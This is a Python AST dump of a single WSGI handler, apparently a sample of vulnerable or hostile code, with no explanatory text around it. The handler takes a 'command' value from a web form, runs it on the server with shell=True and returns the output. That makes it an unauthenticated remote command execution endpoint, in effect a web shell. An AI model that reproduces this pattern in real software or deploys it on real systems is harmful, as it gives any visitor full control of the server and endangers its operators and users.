Module(
    body=[
        Import(
            names=[
                alias(name='cgi')]),
        Import(
            names=[
                alias(name='subprocess')]),
        FunctionDef(
            name='handle_request',
            args=arguments(
                posonlyargs=[],
                args=[
                    arg(arg='environ'),
                    arg(arg='start_response')],
                kwonlyargs=[],
                kw_defaults=[],
                defaults=[]),
            body=[
                Assign(
                    targets=[
                        Name(id='form', ctx=Store())],
                    value=Call(
                        func=Attribute(
                            value=Name(id='cgi', ctx=Load()),
                            attr='FieldStorage',
                            ctx=Load()),
                        args=[],
                        keywords=[
                            keyword(
                                arg='environ',
                                value=Name(id='environ', ctx=Load()))])),
                Assign(
                    targets=[
                        Name(id='command', ctx=Store())],
                    value=Call(
                        func=Attribute(
                            value=Name(id='form', ctx=Load()),
                            attr='getvalue',
                            ctx=Load()),
                        args=[
                            Constant(value='command')],
                        keywords=[])),
                Try(
                    body=[
                        Assign(
                            targets=[
                                Name(id='result', ctx=Store())],
                            value=Call(
                                func=Attribute(
                                    value=Name(id='subprocess', ctx=Load()),
                                    attr='run',
                                    ctx=Load()),
                                args=[
                                    Name(id='command', ctx=Load())],
                                keywords=[
                                    keyword(
                                        arg='shell',
                                        value=Constant(value=True)),
                                    keyword(
                                        arg='capture_output',
                                        value=Constant(value=True)),
                                    keyword(
                                        arg='text',
                                        value=Constant(value=True)),
                                    keyword(
                                        arg='check',
                                        value=Constant(value=True))])),
                        Expr(
                            value=Call(
                                func=Name(id='start_response', ctx=Load()),
                                args=[
                                    Constant(value='200 OK'),
                                    List(
                                        elts=[
                                            Tuple(
                                                elts=[
                                                    Constant(value='Content-Type'),
                                                    Constant(value='text/plain')],
                                                ctx=Load())],
                                        ctx=Load())],
                                keywords=[])),
                        Return(
                            value=List(
                                elts=[
                                    Call(
                                        func=Attribute(
                                            value=Attribute(
                                                value=Name(id='result', ctx=Load()),
                                                attr='stdout',
                                                ctx=Load()),
                                            attr='encode',
                                            ctx=Load()),
                                        args=[],
                                        keywords=[])],
                                ctx=Load()))],
                    handlers=[
                        ExceptHandler(
                            type=Attribute(
                                value=Name(id='subprocess', ctx=Load()),
                                attr='CalledProcessError',
                                ctx=Load()),
                            name='e',
                            body=[
                                Expr(
                                    value=Call(
                                        func=Name(id='start_response', ctx=Load()),
                                        args=[
                                            Constant(value='500 Internal Server Error'),
                                            List(
                                                elts=[
                                                    Tuple(
                                                        elts=[
                                                            Constant(value='Content-Type'),
                                                            Constant(value='text/plain')],
                                                        ctx=Load())],
                                                ctx=Load())],
                                        keywords=[])),
                                Return(
                                    value=List(
                                        elts=[
                                            Call(
                                                func=Attribute(
                                                    value=JoinedStr(
                                                        values=[
                                                            Constant(value='Error executing command: '),
                                                            FormattedValue(
                                                                value=Name(id='e', ctx=Load()),
                                                                conversion=-1)]),
                                                    attr='encode',
                                                    ctx=Load()),
                                                args=[],
                                                keywords=[])],
                                        ctx=Load()))])],
                    orelse=[],
                    finalbody=[])],
            decorator_list=[])],
    type_ignores=[])